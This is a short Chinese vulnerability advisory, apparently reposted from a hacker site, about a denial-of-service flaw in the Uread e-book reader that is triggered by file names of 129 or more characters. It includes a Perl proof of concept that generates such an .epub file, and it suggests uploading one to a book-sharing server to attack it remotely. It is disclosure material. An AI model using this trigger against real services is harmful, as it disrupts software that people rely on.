Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。

远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。

测试证明

———————————————————–

#!/usr/bin/perl -w

$filename=”a”x129;

print “——Generate testfile \”a\”x129.epub——\n”;

open(TESTFILE, “>$filename.epub”);

sleep(3);

close(TESTFILE);

print “——Complete!——\n”;

exit(1);

———————————————————–

修复方案:

目前厂商还没有提供补丁或者升级程序。

作者 demonalex



声明:本站(华域联盟www.cnhackhy.com)所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。